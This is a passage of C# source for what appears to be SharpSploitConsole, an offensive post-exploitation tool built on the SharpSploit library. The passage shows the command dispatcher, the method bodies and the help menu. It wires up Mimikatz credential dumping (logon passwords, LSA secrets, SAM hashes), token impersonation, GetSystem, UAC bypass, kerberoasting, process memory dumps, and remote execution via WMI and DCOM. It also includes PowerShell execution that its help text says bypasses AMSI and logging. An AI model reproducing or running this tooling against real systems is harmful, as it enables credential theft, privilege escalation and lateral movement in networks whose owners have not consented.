searcherBuilder(request); 153 | string[] argsLower = request.Select(s => s.ToLowerInvariant()).ToArray(); 154 | if (Array.IndexOf(argsLower, "-target") > -1) 155 | { 156 | IEnumerable target = new String[] { request[Array.IndexOf(request, "-target") + 1] }; 157 | getDomainGroups(searcher, target); 158 | } 159 | else 160 | { 161 | getDomainGroups(searcher); 162 | } 163 | } 164 | else if (request[0].ToLower() == "getdomaincomputers") 165 | { 166 | SharpSploit.Enumeration.Domain.DomainSearcher searcher = searcherBuilder(request); 167 | string[] argsLower = request.Select(s => s.ToLowerInvariant()).ToArray(); 168 | if (Array.IndexOf(argsLower, "-target") > -1) 169 | { 170 | IEnumerable target = new String[] { request[Array.IndexOf(request, "-target") + 1] }; 171 | getDomainComputers(searcher, target); 172 | } 173 | else 174 | { 175 | getDomainComputers(searcher); 176 | } 177 | } 178 | else if (request[0].ToLower() == "currentdirectory") 179 | { 180 | currentDirectory(); 181 | } 182 | else if (request[0].ToLower() == "directorylisting") 183 | { 184 | directoryListing(); 185 | } 186 | else if (request[0].ToLower() == "changedirectory") 187 | { 188 | changeDirectory(request); 189 | } 190 | else if (request[0].ToLower() == "hostname") 191 | { 192 | hostname(); 193 | } 194 | else if (request[0].ToLower() == "processlist") 195 | { 196 | processList(); 197 | } 198 | else if (request[0].ToLower() == "procdump") 199 | { 200 | procDump(request); 201 | } 202 | else if (request[0].ToLower() == "username") 203 | { 204 | username(); 205 | } 206 | else if (request[0].ToLower() == "readregistry") 207 | { 208 | readReg(request); 209 | } 210 | else if (request[0].ToLower() == "writeregistry") 211 | { 212 | writeReg(request); 213 | } 214 | else if (request[0].ToLower() == "netlocalgroupmembers") 215 | { 216 | netLocalGroupMembers(request); 217 | } 218 | else if (request[0].ToLower() == "netlocalgroups") 219 | { 220 | netLocalGroups(request); 221 | } 222 | else if (request[0].ToLower() == "netloggedonusers") 223 | { 224 | netLoggedOnUsers(request); 225 | } 226 | else if (request[0].ToLower() == "netsessions") 227 | { 228 | netSessions(request); 229 | } 230 | else if (request[0].ToLower() == "ping") 231 | { 232 | ping(request); 233 | } 234 | else if (request[0].ToLower() == "portscan") 235 | { 236 | portScan(request); 237 | } 238 | //SharpSploit Lateral Movement Modules 239 | else if (request[0].ToLower() == "wmi") 240 | { 241 | wmi(request); 242 | } 243 | else if (request[0].ToLower() == "dcom") 244 | { 245 | dcom(request); 246 | } 247 | //SharpSploit Execution Modules 248 | else if (request[0].ToLower() == "shell") 249 | { 250 | shell(request); 251 | } 252 | else if (request[0].ToLower() == "powershell") 253 | { 254 | powerShell(request); 255 | } 256 | //Unknown command 257 | else 258 | { 259 | Console.WriteLine("unknown command, type help for commandline options"); 260 | } 261 | }//End Try 262 | catch 263 | { 264 | Console.WriteLine(error); 265 | } 266 | } 267 | //Methods 268 | private static void mimiAll() 269 | { 270 | var a = SharpSploit.Credentials.Mimikatz.All(); 271 | Console.WriteLine(a); 272 | } 273 | private static void mimiCommand(String[] request) 274 | { 275 | List clist = new List(); 276 | clist = String.Join(" ", request).Split(' ').Skip(1).ToList(); 277 | String command = "\"" + String.Join(" ", clist) + "\""; 278 | Console.WriteLine(command); 279 | var a = SharpSploit.Credentials.Mimikatz.Command(command); 280 | Console.WriteLine(a); 281 | } 282 | private static void logonPasswords() 283 | { 284 | var a = SharpSploit.Credentials.Mimikatz.LogonPasswords(); 285 | Console.WriteLine(a); 286 | } 287 | private static void lsaCache() 288 | { 289 | var a = SharpSploit.Credentials.Mimikatz.LsaCache(); 290 | Console.WriteLine(a); 291 | } 292 | private static void lsaSecrets() 293 | { 294 | var a = SharpSploit.Credentials.Mimikatz.LsaSecrets(); 295 | Console.WriteLine(a); 296 | } 297 | private static void samDump() 298 | { 299 | var a = SharpSploit.Credentials.Mimikatz.SamDump(); 300 | Console.WriteLine(a); 301 | } 302 | private static void wDigest() 303 | { 304 | var a = SharpSploit.Credentials.Mimikatz.Wdigest(); 305 | Console.WriteLine(a); 306 | } 307 | private static void WhoAmI() 308 | { 309 | SharpSploit.Credentials.Tokens whoami = new SharpSploit.Credentials.Tokens(); 310 | var a = whoami.WhoAmI(); 311 | Console.WriteLine(a); 312 | } 313 | private static void getSystem() 314 | { 315 | String error = ER(); 316 | SharpSploit.Credentials.Tokens getSys = new SharpSploit.Credentials.Tokens(); 317 | var a = getSys.GetSystem(); 318 | Console.WriteLine(a); 319 | } 320 | private static void impersonateProcess(String[] request) 321 | { 322 | String error = ER(); 323 | uint procID = UInt32.Parse(request[1]); 324 | SharpSploit.Credentials.Tokens impersonate = new SharpSploit.Credentials.Tokens(); 325 | var a = impersonate.ImpersonateProcess(procID); 326 | Console.WriteLine(a); 327 | } 328 | private static void bypassUAC(String[] request) 329 | { 330 | SharpSploit.Credentials.Tokens uac = new SharpSploit.Credentials.Tokens(); 331 | int pid = 0; 332 | uac.BypassUAC(request[1], request[2], request[3], pid); 333 | } 334 | private static void revertToSelf() 335 | { 336 | SharpSploit.Credentials.Tokens revert = new SharpSploit.Credentials.Tokens(); 337 | var a = revert.RevertToSelf(); 338 | Console.WriteLine(a); 339 | } 340 | private static void kerberoast(SharpSploit.Enumeration.Domain.DomainSearcher searcher, IEnumerable target = null) 341 | { 342 | List a = searcher.Kerberoast(target); 343 | foreach (SharpSploit.Enumeration.Domain.SPNTicket val in a) 344 | { 345 | Console.WriteLine(val.GetFormattedHash()); 346 | } 347 | } 348 | private static void getDomainUsers(SharpSploit.Enumeration.Domain.DomainSearcher searcher, IEnumerable target = null) 349 | { 350 | List a = searcher.GetDomainUsers(target); 351 | foreach (SharpSploit.Enumeration.Domain.DomainObject val in a) 352 | { 353 | Console.WriteLine(val.ToString()); 354 | } 355 | } 356 | private static void getDomainGroups(SharpSploit.Enumeration.Domain.DomainSearcher searcher, IEnumerable target = null) 357 | { 358 | List a = searcher.GetDomainGroups(target); 359 | foreach (SharpSploit.Enumeration.Domain.DomainObject val in a) 360 | { 361 | Console.WriteLine(val.ToString()); 362 | } 363 | } 364 | private static void getDomainComputers(SharpSploit.Enumeration.Domain.DomainSearcher searcher, IEnumerable target = null) 365 | { 366 | List a = searcher.GetDomainComputers(target); 367 | foreach (SharpSploit.Enumeration.Domain.DomainObject val in a) 368 | { 369 | Console.WriteLine(val.ToString()); 370 | } 371 | } 372 | private static void currentDirectory() 373 | { 374 | var a = SharpSploit.Enumeration.Host.GetCurrentDirectory(); 375 | Console.WriteLine(a); 376 | } 377 | private static void directoryListing() 378 | { 379 | var a = SharpSploit.Enumeration.Host.GetDirectoryListing(); 380 | Console.WriteLine(a); 381 | } 382 | private static void changeDirectory(String[] request) 383 | { 384 | SharpSploit.Enumeration.Host.ChangeCurrentDirectory(request[1]); 385 | } 386 | private static void hostname() 387 | { 388 | var a = SharpSploit.Enumeration.Host.GetHostname(); 389 | Console.WriteLine(a); 390 | } 391 | private static void processList() 392 | { 393 | var a = SharpSploit.Enumeration.Host.GetProcessList(); 394 | Console.WriteLine(a); 395 | } 396 | private static void procDump(String[] request) 397 | { 398 | int pid = Int32.Parse(request[1]); 399 | SharpSploit.Enumeration.Host.CreateProcessDump(pid, request[2], request[3]); 400 | } 401 | private static void username() 402 | { 403 | var a = SharpSploit.Enumeration.Host.GetUsername(); 404 | Console.WriteLine(a); 405 | } 406 | private static void readReg(String[] request) 407 | { 408 | var a = SharpSploit.Enumeration.Host.RegistryRead(request[1]); 409 | Console.WriteLine(a); 410 | } 411 | private static void writeReg(String[] request) 412 | { 413 | var a = SharpSploit.Enumeration.Host.RegistryWrite(request[1], request[2]); 414 | Console.WriteLine(a); 415 | } 416 | private static void netLocalGroupMembers(String[] request) 417 | { 418 | var Creds = new SharpSploit.Enumeration.Domain.Credential(request[3], request[4]); 419 | var a = SharpSploit.Enumeration.Net.GetNetLocalGroupMembers(request[1], request[2], Creds); 420 | foreach (var i in a) 421 | { 422 | Console.WriteLine(i); 423 | } 424 | } 425 | private static void netLocalGroups(String[] request) 426 | { 427 | var Creds = new SharpSploit.Enumeration.Domain.Credential(request[2], request[3]); 428 | var a = SharpSploit.Enumeration.Net.GetNetLocalGroups(request[1], Creds); 429 | foreach (var i in a) 430 | { 431 | Console.WriteLine(i); 432 | } 433 | } 434 | private static void netLoggedOnUsers(String[] request) 435 | { 436 | var Creds = new SharpSploit.Enumeration.Domain.Credential(request[2], request[3]); 437 | var a = SharpSploit.Enumeration.Net.GetNetLoggedOnUsers(request[1], Creds); 438 | foreach (var i in a) 439 | { 440 | Console.WriteLine(i); 441 | } 442 | } 443 | private static void netSessions(String[] request) 444 | { 445 | var Creds = new SharpSploit.Enumeration.Domain.Credential(request[2], request[3]); 446 | var a = SharpSploit.Enumeration.Net.GetNetSessions(request[1], Creds); 447 | foreach (var i in a) 448 | { 449 | Console.WriteLine(i); 450 | } 451 | } 452 | private static void ping(String[] request) 453 | { 454 | int Time = 250; 455 | int Thread = 100; 456 | List clist = new List(); 457 | clist = String.Join(" ", request).Split(' ').Skip(1).ToList(); 458 | var a = SharpSploit.Enumeration.Network.Ping(clist, Time, Thread); 459 | Console.WriteLine(a); 460 | } 461 | private static void portScan(String[] request) 462 | { 463 | int Time = 250; 464 | int Thread = 100; 465 | bool Ping = true; 466 | List plist = new List(); 467 | List plist1 = new List(); 468 | plist = String.Join(" ", request).Split(' ').Skip(2).ToList(); 469 | plist1 = plist.Select(int.Parse).ToList(); 470 | var a = SharpSploit.Enumeration.Network.PortScan(request[1], plist1, Ping, Time, Thread); 471 | Console.WriteLine(a); 472 | } 473 | private static SharpSploit.Enumeration.Domain.DomainSearcher searcherBuilder(string[] args) 474 | { 475 | try 476 | { 477 | SharpSploit.Enumeration.Domain.Credential creds = null; 478 | string domain = "", server = "", searchBase = "", searchString = ""; 479 | System.DirectoryServices.SearchScope searchScope = System.DirectoryServices.SearchScope.Subtree; 480 | int resultPageSize = 200; 481 | TimeSpan serverTimeLimit = default(TimeSpan); 482 | bool tombStone = false; 483 | System.DirectoryServices.SecurityMasks securityMasks = 0; 484 | 485 | string[] argsLower = args.Select(s => s.ToLowerInvariant()).ToArray(); 486 | 487 | if (Array.IndexOf(argsLower, "-username") > -1) 488 | { 489 | if (Array.IndexOf(argsLower, "-password") > -1) 490 | { 491 | creds = new SharpSploit.Enumeration.Domain.Credential(args[Array.IndexOf(args, "-username") + 1], args[Array.IndexOf(args, "-password") + 1]); 492 | Console.WriteLine(args[Array.IndexOf(args, "-password") + 1]); 493 | } 494 | else 495 | { 496 | Console.WriteLine("Error, if providing credentials you must provide both a username and password"); 497 | return null; 498 | } 499 | } 500 | if (Array.IndexOf(argsLower, "-domain") > -1) 501 | { 502 | domain = args[Array.IndexOf(args, "-domain") + 1]; 503 | } 504 | if (Array.IndexOf(argsLower, "-server") > -1) 505 | { 506 | server = args[Array.IndexOf(args, "-server") + 1]; 507 | } 508 | if (Array.IndexOf(argsLower, "-searchbase") > -1) 509 | { 510 | searchBase = args[Array.IndexOf(args, "-searchbase") + 1]; 511 | } 512 | if (Array.IndexOf(argsLower, "-searchstring") > -1) 513 | { 514 | searchString = args[Array.IndexOf(args, "-searchstring") + 1]; 515 | } 516 | 517 | var gather = new SharpSploit.Enumeration.Domain.DomainSearcher(creds, domain, server, searchBase, searchString, searchScope, resultPageSize, serverTimeLimit, tombStone, securityMasks); 518 | return gather; 519 | } 520 | catch 521 | { 522 | Console.WriteLine("Error Generating Domain Searcher Object"); 523 | return null; 524 | } 525 | } 526 | private static void wmi(String[] request) 527 | { 528 | List clist = new List(); 529 | clist = String.Join(" ", request).Split(' ').Skip(4).ToList(); 530 | string cmd = string.Join(" ", clist); ; 531 | var a = SharpSploit.LateralMovement.WMI.WMIExecute(request[1], cmd, request[2], request[3]); 532 | Console.WriteLine(a); 533 | } 534 | private static void dcom(String[] request) 535 | { 536 | List plist = new List(); 537 | plist = String.Join(" ", request).Split(' ').Skip(3).ToList(); 538 | string param = string.Join(" ", plist); 539 | var a = SharpSploit.LateralMovement.DCOM.DCOMExecute(request[1], request[2], param); 540 | Console.WriteLine(a); 541 | } 542 | private static void shell(String[] request) 543 | { 544 | List clist = new List(); 545 | clist = String.Join(" ", request).Split(' ').Skip(1).ToList(); 546 | String cmd = String.Join(" ", clist); 547 | Console.WriteLine(cmd); 548 | var a = SharpSploit.Execution.Shell.ShellExecute(cmd); 549 | Console.WriteLine(a); 550 | } 551 | private static void powerShell(String[] request) 552 | { 553 | List clist = new List(); 554 | clist = String.Join(" ", request).Split(' ').Skip(1).ToList(); 555 | String cmd = String.Join(" ", clist); 556 | Console.WriteLine(cmd); 557 | var a = SharpSploit.Execution.Shell.PowerShellExecute(cmd); 558 | Console.WriteLine(a); 559 | } 560 | //Interactive Console 561 | private static void console() 562 | { 563 | while (true) 564 | { 565 | Console.Write("SharpSploitConsole:> "); 566 | String cmd = RL(); 567 | String error = ER(); 568 | Char delimiter = ' '; 569 | String[] request = cmd.Split(delimiter); 570 | commands(request); 571 | } 572 | } 573 | //Error message 574 | private static string ER() 575 | { 576 | string a = "Something went wrong! Check parameters or try running as an admin or system user"; 577 | return a; 578 | } 579 | //Increases Readline from 256 chars to 8192 580 | const int READLINE_BUFFER_SIZE = 8192; 581 | private static string RL() 582 | { 583 | Stream inputStream = Console.OpenStandardInput(READLINE_BUFFER_SIZE); 584 | Console.SetIn(new StreamReader(inputStream, Encoding.Default, false, 8192)); 585 | return Console.ReadLine(); 586 | } 587 | //Help Menu 588 | private static void help() 589 | { 590 | Console.WriteLine(); 591 | Console.WriteLine("Enter Console Mode"); 592 | Console.WriteLine("------------------"); 593 | Console.WriteLine(); 594 | stringPrinter("Interact", "Starts interactive console mode, if you are interacting remotely you may not want to use this option"); 595 | Console.WriteLine(); 596 | Console.WriteLine("SharpSploit Credentials Commands"); 597 | Console.WriteLine("--------------------------------"); 598 | Console.WriteLine(); 599 | Console.WriteLine("Mimikatz"); 600 | Console.WriteLine("--------"); 601 | Console.WriteLine(); 602 | stringPrinter("Mimi-All", "Executes everything but DCSync - requires admin"); 603 | stringPrinter("Mimi-Command", "Executes a chosen Mimikatz command(s)."); 604 | stringPrinter("logonPasswords", "Runs privilege::debug sekurlsa::logonPasswords - requires admin"); 605 | stringPrinter("LsaCache", "Retrieve Domain Cached Credentials hashes from registry - requires admin"); 606 | stringPrinter("LsaSecrets", "Retrieve LSA secrets stored in registry - requires admin"); 607 | stringPrinter("SamDump", "Retrieve password hashes from the SAM database - requires admin"); 608 | stringPrinter("Wdigest", "Retrieve Wdigest credentials from registry"); 609 | Console.WriteLine(); 610 | Console.WriteLine("Tokens"); 611 | Console.WriteLine("------"); 612 | Console.WriteLine(); 613 | stringPrinter("Whoami", "Retrieve current user"); 614 | stringPrinter("GetSystem", "Impersonate system user, requires admin rights. Note: Can be ran in conjunction on the commandline with other commands to execute them with system level permissions. Example: sharpSploitConsole.exe getsystem logonPasswords"); 615 | stringPrinter("Impersonate", "Impersonate the token of a specified process, requires pid - command requires admin rights. Note: Can be ran in conjunction on the commandline with other commands to execute them with permissions of the impersonated user. Example: sharpSploitConsole.exe impersonate 1280 Kerberoast"); 616 | stringPrinter("BypassUAC", "Bypass UAC, requires binary, command | path to binary - requires admin rights"); 617 | stringPrinter("RevertToSelf", "Ends the impersonation of any token, reverts back to initial token associated with current process"); 618 | Console.WriteLine(); 619 | Console.WriteLine("SharpSploit Enumeration Commands"); 620 | Console.WriteLine("--------------------------------"); 621 | Console.WriteLine(); 622 | stringPrinter("CurrentDirectory", "Retrieve current working directory"); 623 | stringPrinter("DirectoryListing", "Retrieve current directory listing"); 624 | stringPrinter("ChangeDirectory", "Changes the current directory by appending a specified string to the current working directory"); 625 | stringPrinter("Hostname", "Retrieve hostname"); 626 | stringPrinter("ProcessList", "Retrieve list of running processes"); 627 | stringPrinter("ProcDump", "Creates a minidump of the memory of a running process, requires PID | output location | output name - requires admin"); 628 | stringPrinter("Username", "Retrieve current username"); 629 | stringPrinter("ReadRegistry", "Retrieve registry path value, requires full path argument"); 630 | stringPrinter("WriteRegistry", "Write to registry, requires full path | value"); 631 | stringPrinter("NetLocalGroupMembers", "Retrieve users of local group from a remote system, requires computername | groupname | username | password"); 632 | stringPrinter("NetLocalGroups", "Retrieve local groups from a remote system, requires computername | username | password"); 633 | stringPrinter("NetLoggedOnUsers", "Retrieve current logged on users from a remote system, requires computername| username | password"); 634 | stringPrinter("NetSessions", "Retrieve user sessions from a remote system, requires computername | username | password"); 635 | stringPrinter("Ping", "Ping systems, requires computernames"); 636 | stringPrinter("PortScan", "Port scan systems, requires computername | ports"); 637 | Console.WriteLine(); 638 | Console.WriteLine("SharpSploit Domain Enumeration Commands"); 639 | Console.WriteLine("--------------------------------"); 640 | Console.WriteLine("Note: optional args require the specified flag in addition to the value to set"); 641 | Console.WriteLine(); 642 | stringPrinter("GetDomainUsers", "Grabs specified (or all) user objects in the target domain, by default will use current user context. optional arguments: -username -password -domain -server -searchbase -searchstring -target. Example: sharpSploitConsole.exe GetDomainUsers"); 643 | stringPrinter("GetDomainGroups", "Grabs specified (or all) group objects in the target domain, by default will use current user context. optional arguments: -username -password -domain -server -searchbase -searchstring -target. Example: sharpSploitConsole.exe GetDomainGroups -target \"Domain Admins\""); 644 | stringPrinter("GetDomainComputers", "Grabs specified (or all) computer objects in the target domain, by default will use current user context. optional arguments: -username -password -domain -server -searchbase -searchstring -target. Example: sharpSploitConsole.exe GetDomainComputers -target TestDC01"); 645 | stringPrinter("Kerberoast", "Performs a kerberoasting attack against targeted (or all) user objects in the target domain, by default will use current user context. optional arguments: -username -password -domain -server -searchbase -searchstring -target. Example: sharpSploitConsole.exe kerberoast -username bob -password Password1 -domain test.corp -server 192.168.1.10 -target sqlService"); 646 | 647 | Console.WriteLine(); 648 | Console.WriteLine("SharpSploit Lateral Movement Commands"); 649 | Console.WriteLine("--------------------------------"); 650 | Console.WriteLine(); 651 | stringPrinter("WMI", "Run command remotely via WMI, requires computername | username | password | command - requires admin"); 652 | stringPrinter("DCOM", "Run command remotely via DCOM, requires computername | command | directory | params - requires admin"); 653 | Console.WriteLine(); 654 | Console.WriteLine(); 655 | Console.WriteLine("SharpSploit Command Execution"); 656 | Console.WriteLine("--------------------------------"); 657 | Console.WriteLine(); 658 | stringPrinter("Shell", "Run a shell command. Example: shell net user"); 659 | stringPrinter("Powershell", "Runs a powershell command while attempting to bypass AMSI, scriptBlock logging, and Module logging. Example: sharpSploitConsole.exe powershell $PSVersionTable.PSVersion"); 660 | Console.WriteLine(); 661 | Console.WriteLine(); 662 | } 663 | private static void stringPrinter(string title, string description = "") 664 | { 665 | int firstIteration = 0; 666 | Console.Write("{0,-30}", title); 667 | if (description.Length == 0) 668 | { 669 | Console.WriteLine(); 670 | } 671 | while (description.Length > 0) 672 | { 673 | try 674 | { 675 | string choppedDesc = description.Substring(0, 85); 676 | int tempCut = choppedDesc.LastIndexOf(" "); 677 | if (firstIteration == 0) 678 | { 679 | Console.WriteLine("{0,-85}", description.Substring(0, tempCut)); 680 | firstIteration = 1; 681 | } 682 | else 683 | { 684 | Console.WriteLine("{0,-30} {1,-85}", "", description.Substring(0, tempCut)); 685 | } 686 | description = description.Remove(0, tempCut); 687 | } 688 | catch 689 | { 690 | if (firstIteration == 0) 691 | { 692 | Console.WriteLine("{0,-85}", description); 693 | } 694 | else 695 | { 696 | Console.WriteLine("{0,-30} {1,-85}", "", description); 697 | } 698 | break; 699 | } 700 | } 701 | } 702 | private static void art() 703 | { 704 | string asci = 705 | @" 706 | 707 | 708 | 709 | 710 | _________.__ _________ .__ .__ __ 711 | / _____/| |__ _____ _____________ / _____/_____ | | ____ |__|/ |_ 712 | \_____ \ | | \\__ \\_ __ \____ \\_____ \\____ \| | / _ \| \ __\ 713 | / \| Y \/ __ \| | \/ |_> > \ |_> > |_( <_> ) || | 714 | /_______ /|___| (____ /__| | __/_______ / __/|____/\____/|__||__| 715 | \/ \/ \/ |__| \/|__| "; 716 | 717 | string console = "@ [Console Edition v 1.1]@@" + 718 | " Written by anthemtotheego & g0ldengunsec@@" + 719 | "@" + 720 | " Type help or ? to show menu options@@@@"; 721 | 722 | console = console.Replace("@", System.Environment.NewLine); 723 | Console.WriteLine(asci); 724 | Console.WriteLine(console); 725 | } 726 | } 727 | } 728 | --------------------------------------------------------------------------------